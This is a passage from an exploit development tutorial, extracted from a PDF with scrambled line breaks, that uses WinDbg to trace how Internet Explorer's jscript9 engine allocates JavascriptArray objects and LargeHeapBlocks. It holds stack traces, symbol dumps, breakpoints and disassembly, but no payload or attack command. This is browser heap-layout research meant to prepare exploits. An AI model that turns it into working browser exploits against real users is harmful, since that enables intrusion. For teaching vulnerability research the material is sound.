http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 305 
-
 
0671c154 6eafe0b7 jscript9
!ScriptEngine::ParseScriptTextCore+0x2ad
 
0671c1a8 069cb60c jscript9!ScriptEngine::ParseScriptText+0x5b
 
0671c1e0 069c945d MSHTML!CActiveScriptHolder::ParseScriptText+0x42
 
0671c230 069bb52f MSHTML!CJScript9Holder::ParseScriptText+0x58
 
0671c2a4 069cc6a4 MSHTM
L!CScriptCollection::ParseScriptText+0x1f0
 
0671c394 069cc242 MSHTML!CScriptData::CommitCode+0x36e
 
0671c40c 069cbe6e MSHTML!CScriptData::Execute+0x233
 
0671c420 069c9b49 MSHTML!CHtmScriptParseCtx::Execute+0x89
 
0671c498 067d77cc MSHTML!CHtmParseBase::Execute+
0x17c
 
0671c4c4 755862fa MSHTML!CHtmPost::Broadcast+0x88
 
0671c5c4 069c3273 user32!InternalCallWinProc+0x23
 
0671c5dc 069c31ff MSHTML!CHtmPost::Run+0x1c
 
0671c5f4 069c34f3 MSHTML!PostManExecute+0x5f
 
0671c610 069c34b2 MSHTML!PostManResume+0x7b
 
0671c650 06830dc9
 MSHTML!CHtmPost::OnDwnChanCallback+0x3a
 
0671c660 0677866c MSHTML!CDwnChan::OnMethodCall+0x19
 
0671c6b4 067784fa MSHTML!GlobalWndOnMethodCall+0x169
 
0671c700 755862fa MSHTML!GlobalWndProc+0xd7
 
0671c72c 75586d3a user32!InternalCallWinProc+0x23
 
0671c7a4 755877
c4 user32!UserCallWinProcCheckWow+0x109
 
0671c804 7558788a user32!DispatchMessageWorker+0x3bc
 
By comparing the last two stack traces, we can see that we’re still in the same call of 
jscript9!Js::JavascriptArray::DirectSetItem_Full
. So, 
DirectSetItem_Full
 fi
rst allocates a block of 
0x1010
 
bytes through 
jscript9!Recycler::AllocZero
 and then initializes the object.
 
But if all this happens inside 
jscript9!Js::JavascriptArray::DirectSetItem_Full
, then the 
JavascriptArray
 
instance has already been created. Let’s t
ry to break on the constructor. First let’s make sure that it exists:
 
0:007> x jscript9!Js::JavascriptArray::JavascriptArray
 
6ea898d6          jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>)
 
6ead481d          jscript9!Js::JavascriptArra
y::JavascriptArray (<no parameter info>)
 
6eb28b61          jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>)
 
We got three addresses.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 306 
-
 
Let’s delete the previous breakpoints with 
bc *
, hit 
F5
 and reload the page in IE. At the first dialog bo
x, let’s 
go back in WinDbg. Now let’s put a breakpoint at each one of the three addresses:
 
0:006> bp 6ea898d6          
 
0:006> bp 6ead481d          
 
0:006> bp 6eb28b61          
 
0:006> bl
 
 0 e 6ea898d6     0001 (0001)  0:**** jscript9!Js::JavascriptArray::
JavascriptArray
 
 1 e 6ead481d     0001 (0001)  0:**** jscript9!Js::JavascriptArray::JavascriptArray
 
 2 e 6eb28b61     0001 (0001)  0:**** jscript9!Js::JavascriptArray::JavascriptArray
 
Hit 
F5
 and close the dialog box. Mmm... the 
Done
 dialog box appears and no
ne of our breakpoints is 
triggered. How odd...
 
Let’s see if we find something interesting in the list of symbols:
 
0:006> x jscript9!Js::JavascriptArray::*
 
6ec61e36          jscript9!Js::JavascriptArray::IsEnumerable (<no parameter info>)
 
6eabff71          js
cript9!Js::JavascriptArray::GetFromIndex (<no parameter info>)
 
6ec31bed          jscript9!Js::JavascriptArray::BigIndex::BigIndex (<no parameter info>)
 
6ec300ee          jscript9!Js::JavascriptArray::SetEnumerable (<no parameter info>)
 
6eb94bd9          js
cript9!Js::JavascriptArray::EntrySome (<no parameter info>)
 
6eace48c          jscript9!Js::JavascriptArray::HasItem (<no parameter info>)
 
6ea42530          jscript9!Js::JavascriptArray::`vftable' = <no type information>
 
6ec31a2f          jscript9!Js::Javas
criptArray::BigIndex::SetItem (<no parameter info>)
 
6ec301d1          jscript9!Js::JavascriptArray::IsDirectAccessArray (<no parameter info>)
 
6eacab83          jscript9!Js::JavascriptArray::Sort (<no parameter info>)
 
6ecd5500          jscript9!Js::Javascri
ptArray::EntryInfo::Map = <no type information>
 
6eb66721          jscript9!Js::JavascriptArray::EntryIsArray (<no parameter info>)
 
6ec2fd64          jscript9!Js::JavascriptArray::GetDiagValueString (<no parameter info>)
 
6ec2faeb          jscript9!Js::Javas
criptArray::GetNonIndexEnumerator (<no parameter info>)
 
6ec3043a          jscript9!Js::JavascriptArray::Unshift<Js::JavascriptArray::BigIndex> (<no parameter info>)
 
6eb4ba72          jscript9!Js::JavascriptArray::EntryReverse (<no parameter info>)
 
6eaed10f
          jscript9!Js::JavascriptArray::SetLength (<no parameter info>)
 
6eacaadf          jscript9!Js::JavascriptArray::EntrySort (<no parameter info>)
 
6ec306c9          jscript9!Js::JavascriptArray::ToLocaleString<Js::JavascriptArray> (<no parameter info>
)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 307 
-
 
6eb5f4ce          jscript9!Js::JavascriptArray::BuildSegmentMap (<no parameter info>)
 
6ec2fef5          jscript9!Js::JavascriptArray::Freeze (<no parameter info>)
 
6ec31c5f          jscript9!Js::JavascriptArray::GetLocaleSeparator (<no parameter info>)
 
6e
cd54f0          jscript9!Js::JavascriptArray::EntryInfo::LastIndexOf = <no type information>
 
6eb9b990          jscript9!Js::JavascriptArray::EntryUnshift (<no parameter info>)
 
6ec30859          jscript9!Js::JavascriptArray::ObjectSpliceHelper<unsigned int>
 (<no parameter info>)
 
6ec31ab5          jscript9!Js::JavascriptArray::BigIndex::operator+ (<no parameter info>)
 
6ea898d6          jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>)
 
6eb5f8f5          jscript9!Js::JavascriptArray::ArrayElem
entEnumerator::ArrayElementEnumerator (<no parameter info>)
 
6ec30257          jscript9!Js::JavascriptArray::IndexTrace<unsigned int>::SetItem (<no parameter info>)
 
6ead481d          jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>)
 
6eac28
1d          jscript9!Js::JavascriptArray::ConcatArgs<unsigned int> (<no parameter info>)
 
6ecd5510          jscript9!Js::JavascriptArray::EntryInfo::Reduce = <no type information>
 
6ea9bf88          jscript9!Js::JavascriptArray::DirectSetItem_Full (<no param
eter info>)
 
6eb9d5ee          jscript9!Js::JavascriptArray::EntryConcat (<no parameter info>)
 
6ecd5490          jscript9!Js::JavascriptArray::EntryInfo::ToString = <no type information>
 
6eb49e52          jscript9!Js::JavascriptArray::GetEnumerator (<no par
ameter info>)
 
6ecd5430          jscript9!Js::JavascriptArray::EntryInfo::Reverse = <no type information>
 
6eb66c77          jscript9!Js::JavascriptArray::EntryIndexOf (<no parameter info>)
 
6eb93fa5          jscript9!Js::JavascriptArray::EntryEvery (<no para
meter info>)
 
6ecd53e0          jscript9!Js::JavascriptArray::EntryInfo::IsArray = <no type information>
 
6ec31e6d          jscript9!Js::JavascriptArray::JoinOtherHelper (<no parameter info>)
 
6ec31d73          jscript9!Js::JavascriptArray::sort (<no paramete
r info>)
 
6eb94d8c          jscript9!Js::JavascriptArray::EntryFilter (<no parameter info>)
 
6ec32052          jscript9!Js::JavascriptArray::EntryToLocaleString (<no parameter info>)
 
6ec61e52          jscript9!Js::JavascriptArray::IsConfigurable (<no paramet
er info>)
 
6ecd5410          jscript9!Js::JavascriptArray::EntryInfo::Join = <no type information>
 
6ec31d56          jscript9!Js::JavascriptArray::CompareElements (<no parameter info>)
 
6eb5f989          jscript9!Js::JavascriptArray::InternalCopyArrayElement
s<unsigned int> (<no parameter info>)
 
6eaef6d1          jscript9!Js::JavascriptArray::IsItemEnumerable (<no parameter info>)
 
6eb9d4cb          jscript9!Js::JavascriptArray::EntrySplice (<no parameter info>)
 
6eacf7f0          jscript9!Js::JavascriptArray::E
ntryToString (<no parameter info>)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 308 
-
 
6eb5f956          jscript9!Js::JavascriptArray::CopyArrayElements (<no parameter info>)
 
6ec325e0          jscript9!Js::JavascriptArray::PrepareDetach (<no parameter info>)
 
6ecd53f0          jscript9!Js::JavascriptArray::E
ntryInfo::Push = <no type information>
 
6ec30a8b          jscript9!Js::JavascriptArray::ObjectSpliceHelper<Js::JavascriptArray::BigIndex> (<no parameter info>)
 
6ec301f7          jscript9!Js::JavascriptArray::DirectSetItemIfNotExist (<no parameter info>)
 
6ec
30083          jscript9!Js::JavascriptArray::SetWritable (<no parameter info>)
 
6ec30019          jscript9!Js::JavascriptArray::SetConfigurable (<no parameter info>)
 
6ec31b1d          jscript9!Js::JavascriptArray::BigIndex::operator++ (<no parameter info>)
 
6ecd54b0          jscript9!Js::JavascriptArray::EntryInfo::IndexOf = <no type information>
 
6eba1498          jscript9!Js::JavascriptArray::EntryPush (<no parameter info>)
 
6ecd5460          jscript9!Js::JavascriptArray::EntryInfo::Sort = <no type informatio
n>
 
6ec2fcbb          jscript9!Js::JavascriptArray::SetItemAttributes (<no parameter info>)
 
6ea8497f          jscript9!Js::JavascriptArray::ArrayElementEnumerator::Init (<no parameter info>)
 
6ecd5350          jscript9!Js::JavascriptArray::EntryInfo::NewInst
ance = <no type information>
 
6eac0596          jscript9!Js::JavascriptArray::EntryPop (<no parameter info>)
 
6ea82f23          jscript9!Js::JavascriptArray::GetItem (<no parameter info>)
 
6ec2ffb1          jscript9!Js::JavascriptArray::SetAttributes (<no par
ameter info>)
 
6eae718b          jscript9!Js::JavascriptArray::GetItemReference (<no parameter info>)
 
6ec2fd46          jscript9!Js::JavascriptArray::GetDiagTypeString (<no parameter info>)
 
6eb61889          jscript9!Js::JavascriptArray::DeleteItem (<no par
ameter info>)
 
6ecd5450          jscript9!Js::JavascriptArray::EntryInfo::Slice = <no type information>
 
6ec319be          jscript9!Js::JavascriptArray::BigIndex::SetItemIfNotExist (<no parameter info>)
 
6ecd5530          jscript9!Js::JavascriptArray::EntryIn
fo::Some = <no type information>
 
6eb16a13          jscript9!Js::JavascriptArray::EntryJoin (<no parameter info>)
 
6ecd5470          jscript9!Js::JavascriptArray::EntryInfo::Splice = <no type information>
 
6ec2fc89          jscript9!Js::JavascriptArray::SetIt
emAccessors (<no parameter info>)
 
6ec2ff1d          jscript9!Js::JavascriptArray::Seal (<no parameter info>)
 
6eb5b713          jscript9!Js::JavascriptArray::GetItemSetter (<no parameter info>)
 
6eb49dc0          jscript9!Js::JavascriptArray::GetEnumerator (
<no parameter info>)
 
6ec30284          jscript9!Js::JavascriptArray::InternalCopyArrayElements<Js::JavascriptArray::BigIndex> (<no parameter inf
o>)
 
6ec318bb          jscript9!Js::JavascriptArray::BigIndex::DeleteItem (<no parameter info>)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 309 
-
 
6eb94158         
 jscript9!Js::JavascriptArray::EntryLastIndexOf (<no parameter info>)
 
6eba4b06          jscript9!Js::JavascriptArray::NewInstance (<no parameter info>)  <
-------------------------
 
6ecd5520          jscript9!Js::JavascriptArray::EntryInfo::ReduceRight = <no
 type information>
 
6ecd54e0          jscript9!Js::JavascriptArray::EntryInfo::ForEach = <no type information>
 
6ec31d27          jscript9!Js::JavascriptArray::EnforceCompatModeRestrictions (<no parameter info>)
 
6ecd5440          jscript9!Js::JavascriptArray
::EntryInfo::Shift = <no type information>
 
6eab5de1          jscript9!Js::JavascriptArray::SetProperty (<no parameter info>)
 
6ecd5400          jscript9!Js::JavascriptArray::EntryInfo::Concat = <no type information>
 
6ea5b329          jscript9!Js::Javascript
Array::GetProperty (<no parameter info>)
 
6ec2ff43          jscript9!Js::JavascriptArray::SetAccessors (<no parameter info>)
 
6ec2fcea          jscript9!Js::JavascriptArray::SetItemWithAttributes (<no parameter info>)
 
6ea4768d          jscript9!Js::Javascrip
tArray::IsObjectArrayFrozen (<no parameter info>)
 
6eae0c2c          jscript9!Js::JavascriptArray::GetNextIndex (<no parameter info>)
 
6eab5c21          jscript9!Js::JavascriptArray::Is (<no parameter info>)
 
6ec3177e          jscript9!Js::JavascriptArray::Co
pyArrayElements (<no parameter info>)
 
6ec3251d          jscript9!Js::JavascriptArray::SetLength (<no parameter info>)
 
6eb28b61          jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>)
 
6eaeb83a          jscript9!Js::JavascriptArray::Arra
ySpliceHelper (<no parameter info>)
 
6eac3a16          jscript9!Js::JavascriptArray::AllocateHead (<no parameter info>)
 
6eaffed4          jscript9!Js::JavascriptArray::SetPropertyWithAttributes (<no parameter info>)
 
6ead00ce          jscript9!Js::Javascript
Array::HasProperty (<no parameter info>)
 
6ecd54d0          jscript9!Js::JavascriptArray::EntryInfo::Filter = <no type information>
 
6ec3190f          jscript9!Js::JavascriptArray::BigIndex::SetItem (<no parameter info>)
 
6eae60d3          jscript9!Js::Javasc
riptArray::EntryMap (<no parameter info>)
 
6eb16a9c          jscript9!Js::JavascriptArray::JoinHelper (<no parameter info>)
 
6ec31b46          jscript9!Js::JavascriptArray::BigIndex::ToNumber (<no parameter info>)
 
6ea84a80          jscript9!Js::JavascriptArr
ay::ArrayElementEnumerator::ArrayElementEnumerator (<no parameter info>)
 
6ea8495b          jscript9!Js::JavascriptArray::IsAnyArrayTypeId (<no parameter info>)
 
6ec2fd1c          jscript9!Js::JavascriptArray::GetSpecialNonEnumerablePropertyName (<no paramet
er info>)
 
6ec31bd5          jscript9!Js::JavascriptArray::BigIndex::IsSmallIndex (<no parameter info>)
 
6eba157a          jscript9!Js::JavascriptArray::EntryForEach (<no parameter info>)
 
6ea83044          jscript9!Js::JavascriptArray::SetItem (<no parameter
 info>)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 310 
-
 
6ec3050a          jscript9!Js::JavascriptArray::ToLocaleString<Js::RecyclableObject> (<no parameter info>)
 
6ea534e0          jscript9!Js::JavascriptArray::DirectGetItemAt (<no parameter info>)
 
6ecd5420          jscript9!Js::JavascriptArray::EntryIn
fo::Pop = <no type information>
 
6ea59b2d          jscript9!Js::JavascriptArray::ForInLoop (<no parameter info>)
 
6eafff78          jscript9!Js::JavascriptArray::GetSetter (<no parameter info>)
 
6eb4ec30          jscript9!Js::JavascriptArray::ArraySegmentSpli
ceHelper (<no parameter info>)
 
6eb78e45          jscript9!Js::JavascriptArray::EntryReduce (<no parameter info>)
 
6eb6697d          jscript9!Js::JavascriptArray::DirectGetItemAtFull (<no parameter info>)
 
6ec32167          jscript9!Js::JavascriptArray::Entry
ReduceRight (<no parameter info>)
 
6eba717f          jscript9!Js::JavascriptArray::EntryShift (<no parameter info>)
 
6eb99706          jscript9!Js::JavascriptArray::MarshalToScriptContext (<no parameter info>)
 
6ecd54c0          jscript9!Js::JavascriptArray::
EntryInfo::Every = <no type information>
 
6ec3196b          jscript9!Js::JavascriptArray::BigIndex::DeleteItem (<no parameter info>)
 
6eb7c0ba          jscript9!Js::JavascriptArray::PreventExtensions (<no parameter info>)
 
6ecd5480          jscript9!Js::Javas
criptArray::EntryInfo::ToLocaleString = <no type information>
 
6eb93f8b          jscript9!Js::JavascriptArray::DeleteProperty (<no parameter info>)
 
6ec303b9          jscript9!Js::JavascriptArray::Unshift<unsigned int> (<no parameter info>)
 
6ea849d5         
 jscript9!Js::JavascriptArray::FillFromPrototypes (<no parameter info>)
 
6ea5b3cf          jscript9!Js::JavascriptArray::GetPropertyReference (<no parameter info>)
 
6ec317e1          jscript9!Js::JavascriptArray::TruncateToProperties (<no parameter info>)
 
6e
abfc81          jscript9!Js::JavascriptArray::EntrySlice (<no parameter info>)
 
6eae20b0          jscript9!Js::JavascriptArray::JoinToString (<no parameter info>)
 
6ec30ca8          jscript9!Js::JavascriptArray::ConcatArgs<Js::JavascriptArray::BigIndex> (<no
 parameter info>)
 
6ea5c2be          jscript9!Js::JavascriptArray::OP_NewScArray (<no parameter info>)
 
6eb1682e          jscript9!Js::JavascriptArray::JoinArrayHelper (<no parameter info>)
 
6ec31f63          jscript9!Js::JavascriptArray::GetFromLastIndex (<n
o parameter info>)
 
6eb618a1          jscript9!Js::JavascriptArray::DirectDeleteItemAt (<no parameter info>)
 
6ead497d          jscript9!Js::JavascriptArray::MakeCopyOnWriteObject (<no parameter info>)
 
6eb4c512          jscript9!Js::JavascriptArray::EnsureHe
adStartsFromZero (<no parameter info>)
 
6ec31c24          jscript9!Js::JavascriptArray::ToLocaleStringHelper (<no parameter info>)
 
6eae0be6          jscript9!Js::JavascriptArray::GetBeginLookupSegment (<no parameter info>)
 
6ecd54a0          jscript9!Js::Jav
ascriptArray::EntryInfo::Unshift = <no type information>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 311 
-
 
This line looks promising:
 
6eba4b06          jscript9!Js::JavascriptArray::NewInstance (<no parameter info>)
 
Let’s put a breakpoint on it and let’s see if this time we’re lucky.
 
0:006> bc *
 
0:006> bp
 jscript9!Js::JavascriptArray::NewInstance
 
Close the dialog box in IE, reload the page and close the starting dialog. This time everything goes 
according to plans:
 
 
By stepping through the code we get to the following piece of code:
 
6eb02a3c 682870a46e      push    offset jscript9!Recycler::Alloc (6ea47028)
 
6eb02a41 ff770c          push    dword ptr [edi+0Ch]
 
6eb02a44 6a20            
push    20h
 
6eb02a46 e84546f4ff      call    jscript9!operator new<Recycler> (6ea47090)     <
-------------------
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 312 
-
 
6eb02a4b 8bf0            mov     esi,eax   <
---------
 ESI = allocated block
 
6eb02a4d 83c40c          add     esp,0Ch
 
6eb02a50 85f6            t
est    esi,esi
 
6eb02a52 0f841d210a00    je      jscript9!Js::JavascriptArray::NewInstance+0x390 (6eba4b75)
 
6eb02a58 8b8f00010000    mov     ecx,dword ptr [edi+100h]
 
6eb02a5e 894e04          mov     dword ptr [esi+4],ecx
 
6eb02a61 c706b02fa46e    mov     dwo
rd ptr [esi],offset jscript9!Js::DynamicObject::`vftable' (6ea42fb0)
 
6eb02a67 c7460800000000  mov     dword ptr [esi+8],0
 
6eb02a6e c7460c01000000  mov     dword ptr [esi+0Ch],1
 
6eb02a75 8b4118          mov     eax,dword ptr [ecx+18h]
 
6eb02a78 8a4005       
   mov     al,byte ptr [eax+5]
 
The operator new is called as follows:
 
operator new(20h, arg, jscript9!Recycler::Alloc);
 
Let’s look at the code of the 
operator new
:
 
jscript9!operator new<Recycler>:
 
6ea47090 8bff            mov     edi,edi
 
6ea47092 55       
       push    ebp
 
6ea47093 8bec            mov     ebp,esp
 
6ea47095 ff7508          push    dword ptr [ebp+8]      <
-----
 push 20h
 
6ea47098 8b4d0c          mov     ecx,dword ptr [ebp+0Ch]
 
6ea4709b ff5510          call    dword ptr [ebp+10h]    <
-----
 call
 jscript9!Recycler::Alloc
 
6ea4709e 5d              pop     ebp
 
6ea4709f c3              ret
 
Let’s go back to the main code:
 
6eb02a3c 682870a46e      push    offset jscript9!Recycler::Alloc (6ea47028)
 
6eb02a41 ff770c          push    dword ptr [edi+0Ch]
 
6eb
02a44 6a20            push    20h
 
6eb02a46 e84546f4ff      call    jscript9!operator new<Recycler> (6ea47090)     <
-------------------
 
6eb02a4b 8bf0            mov     esi,eax   <
---------
 ESI = allocated block
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 313 
-
 
6eb02a4d 83c40c          add     esp,0Ch
 
6eb0
2a50 85f6            test    esi,esi
 
6eb02a52 0f841d210a00    je      jscript9!Js::JavascriptArray::NewInstance+0x390 (6eba4b75)
 
6eb02a58 8b8f00010000    mov     ecx,dword ptr [edi+100h]
 
6eb02a5e 894e04          mov     dword ptr [esi+4],ecx
 
6eb02a61 c706b
02fa46e    mov     dword ptr [esi],offset jscript9!Js::DynamicObject::`vftable' (6ea42fb0)
 
6eb02a67 c7460800000000  mov     dword ptr [esi+8],0
 
6eb02a6e c7460c01000000  mov     dword ptr [esi+0Ch],1
 
6eb02a75 8b4118          mov     eax,dword ptr [ecx+18h]
 
6eb02a78 8a4005          mov     al,byte ptr [eax+5]
 
6eb02a7b a808            test    al,8
 
6eb02a7d 0f85e8200a00    jne     jscript9!Js::JavascriptArray::NewInstance+0x386 (6eba4b6b)
 
6eb02a83 b803000000      mov     eax,3
 
6eb02a88 89460c          mov     d
word ptr [esi+0Ch],eax
 
6eb02a8b 8b4104          mov     eax,dword ptr [ecx+4] ds:002b:060e9a64=060fb000
 
6eb02a8e 8b4004          mov     eax,dword ptr [eax+4]
 
6eb02a91 8b4918          mov     ecx,dword ptr [ecx+18h]
 
6eb02a94 8bb864040000    mov     edi,dwo
rd ptr [eax+464h]
 
6eb02a9a 8b01            mov     eax,dword ptr [ecx]
 
6eb02a9c ff5014          call    dword ptr [eax+14h]
 
6eb02a9f 8b4e04          mov     ecx,dword ptr [esi+4]
 
6eb02aa2 8b4918          mov     ecx,dword ptr [ecx+18h]
 
6eb02aa5 8b4908     
     mov     ecx,dword ptr [ecx+8]
 
6eb02aa8 3bc1            cmp     eax,ecx
 
6eb02aaa 0f8f0d9f1900    jg      jscript9!memset+0x31562 (6ec9c9bd)
 
6eb02ab0 8b4604          mov     eax,dword ptr [esi+4]
 
6eb02ab3 c7063025a46e    mov     dword ptr [esi],offset j
script9!Js::JavascriptArray::`vftable' (6ea42530)
 
6eb02ab9 c7461c00000000  mov     dword ptr [esi+1Ch],0
 
6eb02ac0 8b4004          mov     eax,dword ptr [eax+4]
 
The important instruction is
 
6eb02ab3 c7063025a46e    mov     dword ptr [esi],offset jscript9!Js
::JavascriptArray::`vftable' (6ea42530)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 314 
-
 
which overwrites the first dword of the block of memory with the vftable of a 
JavascriptArray
.
 
Then another important part of code follows:
 
6eb02ac3 8b4004          mov     eax,dword ptr [eax+4]
 
6eb02ac6 8b8864040000
    mov     ecx,dword ptr [eax+464h]
 
6eb02acc 6a50            push    50h        <
-------
 50h bytes?
 
6eb02ace c7461000000000  mov     dword ptr [esi+10h],0
 
6eb02ad5 e80769f4ff      call    jscript9!Recycler::AllocZero (6ea493e1)    <
------
 allocates a bloc
k
 
6eb02ada c70000000000    mov     dword ptr [eax],0
 
6eb02ae0 c7400400000000  mov     dword ptr [eax+4],0
 
6eb02ae7 c7400810000000  mov     dword ptr [eax+8],10h
 
6eb02aee c7400c00000000  mov     dword ptr [eax+0Ch],0
 
6eb02af5 894618          mov     dword p
tr [esi+18h],eax   <
------
 look at the following picture
 
6eb02af8 894614          mov     dword ptr [esi+14h],eax   <
------
 look at the following picture
 
6eb02afb e951200a00      jmp     jscript9!Js::JavascriptArray::NewInstance+0x24f (6eba4b51)
 
The follow
ing picture shows what happens in the piece of code above:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 315 
-
 
 
Now we have two important addresses:
 
239d9340          address of the Ja
vascriptArray
 
2c1460a0          structure pointed to by the JavascriptArray
 
Let’s delete the breakpoint and resume program execution. When the 
Done
 dialog box pops up, go back to 
WinDbg. Now break the execution in WinDbg and have another look at the addres
s 
239d9340h
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 316 
-
 
 
As we can see, now our 
JavascriptArray
 (at offsets 
0x14
 and 
0x18
) points to a different address. Because a 
Javascript
Array
 is growable, it’s likely that when a bigger buffer is allocated the two pointers at 
0x14
 and 
0x18
 are updated to refer to the new buffer. We can also see that the 
JavascriptArray
 at 
239d9340
 
corresponds to the array 
a
 in the javascript code. Indeed, 
it contains 
10000h
 references to other arrays.
 
We saw that the 
JavascriptArray
 object is allocated in 
jscript9!Js::JavascriptArray::NewInstance
:
 
6eb02a46 e84546f4ff      call    jscript9!operator new<Recycler> (6ea47090)     <
-------------------
 
6eb02a4b 8
bf0            mov     esi,eax   <
---------
 ESI = allocated block
 
If at this point we return from 
jscript9!Js::JavascriptArray::NewInstance
 by pressing 
Shift+F11
, we see the 
following code:
 
6ea125cc ff75ec          push    dword ptr [ebp
-
14h]
 
6ea125cf ff75
e8          push    dword ptr [ebp
-
18h]
 
6ea125d2 ff55e4          call    dword ptr [ebp
-
1Ch]   (jscript9!Js::JavascriptArray::NewInstance)
 
6ea125d5 8b65e0          mov     esp,dword ptr [ebp
-
20h] ss:002b:04d2c0e0=04d2c0c4
 
After the call to 
NewInstance
, 
EAX
 points to the 
JavascriptArray
 structure. So, we can put a breakpoint 
either at 
6eb02a4b
 or at 
6ea125d5
. Let’s choose the latter:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 317 
-
 
 bp jscript9+425d5 ".printf 
\
"new Array: addr = 0x%p
\
\
n
\
",eax;g"
 
Here’s what we discovered so far:
 
 
LargeHeapBlock
 
What is a 
LargeHeapBlock
? Let’s try to find some related symbols:
 
0:007> x jscript9!*largeheapblock*
 
6f696af3          jscript9!HeapInfo::Dele
teLargeHeapBlockList (<no parameter info>)
 
6f5d654d          jscript9!HeapInfo::ReinsertLargeHeapBlock (<no parameter info>)
 
6f6a8699          jscript9!LargeHeapBlock::SweepObjects<2> (<no parameter info>)
 
6f6ab0cf          jscript9!LargeHeapBlock::IsValid
Object (<no parameter info>)
 
6f6a82a8          jscript9!LargeHeapBlock::SweepObjects<1> (<no parameter info>)
 
6f755d4d          jscript9!LargeHeapBlock::GetHeader (<no parameter info>)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 318 
-
 
6f5a160e          jscript9!LargeHeapBlock::ResetMarks (<no parameter in
fo>)
 
6f5a0672          jscript9!LargeHeapBlock::Rescan (<no parameter info>)
 
6f59f32f          jscript9!LargeHeapBlock::IsObjectMarked (<no parameter info>)
 
6f59a7ca          jscript9!HeapInfo::AddLargeHeapBlock (<no parameter info>)    <
------------------
------
 
6f657a87          jscript9!LargeHeapBlock::AddObjectToFreeList (<no parameter info>)
 
6f755f80          jscript9!LargeHeapBlock::Alloc (<no parameter info>)    <
--------------------------
 
6f755dba          jscript9!LargeHeapBlock::GetObjectHeader (<n
o parameter info>)
 
6f755b43          jscript9!HeapBucket::EnumerateObjects<LargeHeapBlock> (<no parameter info>)
 
6f755daf          jscript9!LargeHeapBlock::GetRealAddressFromInterior (<no parameter info>)
 
6f755dee          jscript9!LargeHeapBlock::SetMemor
yProfilerOldObjectBit (<no parameter info>)
 
6f755d9b          jscript9!LargeHeapBlock::GetObjectSize (<no parameter info>)
 
6f5a096b          jscript9!HeapInfo::Rescan<LargeHeapBlock> (<no parameter info>)
 
6f696b24          jscript9!LargeHeapBlock::ReleaseP
agesShutdown (<no parameter info>)
 
6f755e23          jscript9!LargeHeapBlock::SetObjectMarkedBit (<no parameter info>)
 
6f755eaf          jscript9!LargeHeapBlock::FinalizeObjects (<no parameter info>)
 
6f59ef52          jscript9!LargeHeapBlock::SweepObjects<
0> (<no parameter info>)
 
6f755e66          jscript9!LargeHeapBlock::TestObjectMarkedBit (<no parameter info>)
 
6f755daf          jscript9!LargeHeapBlock::MarkInterior (<no parameter info>)
 
6f596e18          jscript9!LargeHeapBlock::`vftable' = <no type info
rmation>
 
Here are the most promising functions:
 
6f59a7ca          jscript9!HeapInfo::AddLargeHeapBlock (<no parameter info>)
 
6f755f80          jscript9!LargeHeapBlock::Alloc (<no parameter info>)
 
Let’s put a breakpoint on both of them and reload the page i
n IE. When we close the 
Start
 dialog box, the 
first breakpoint is triggered and we end up here:
 
6f59a7c5 90              nop
 
6f59a7c6 90              nop
 
6f59a7c7 90              nop
 
6f59a7c8 90              nop
 
6f59a7c9 90              nop
 
jscript9!HeapIn
fo::AddLargeHeapBlock:
 
6f59a7ca 8bff            mov     edi,edi     <
------------
 we are here
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 319 
-
 
6f59a7cc 55              push    ebp
 
6f59a7cd 8bec            mov     ebp,esp
 
6f59a7cf 83ec1c          sub     esp,1Ch
 
6f59a7d2 53              push    ebx
 
6f59a7
d3 56              push    esi
 
6f59a7d4 8b750c          mov     esi,dword ptr [ebp+0Ch]
 
Let’s also look at the stack trace:
 
0:007> k 10
 
ChildEBP RetAddr  
 
04dbbc90 6f59a74d jscript9!HeapInfo::AddLargeHeapBlock
 
04dbbcb4 6f5a72d8 jscript9!Recycler::LargeAllo
c+0x66
 
04dbbcd0 6f652c47 jscript9!Recycler::AllocZero+0x91
 
04dbbd10 6f5d2aae jscript9!Js::JavascriptArray::DirectSetItem_Full+0x3fd
 
04dbbd98 6f5fed13 jscript9!Js::JavascriptOperators::OP_SetElementI+0x1e0
 
04dbbf34 6f5a5cf5 jscript9!Js::InterpreterStackFram
e::Process+0x3579
 
04dbc084 03fd0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x305
 
WARNING: Frame IP not in any known module. Following frames may be wrong.
 
04dbc090 6f5a1f60 0x3fd0fe9
 
04dbc110 6f5a20ca jscript9!Js::JavascriptFunction::CallR
ootFunction+0x140
 
04dbc128 6f5a209f jscript9!Js::JavascriptFunction::CallRootFunction+0x19
 
04dbc170 6f5a2027 jscript9!ScriptSite::CallRootFunction+0x40
 
04dbc198 6f64df75 jscript9!ScriptSite::Execute+0x61
 
04dbc224 6f64db57 jscript9!ScriptEngine::ExecutePend
ingScripts+0x1e9
 
04dbc2ac 6f64e0b7 jscript9!ScriptEngine::ParseScriptTextCore+0x2ad
 
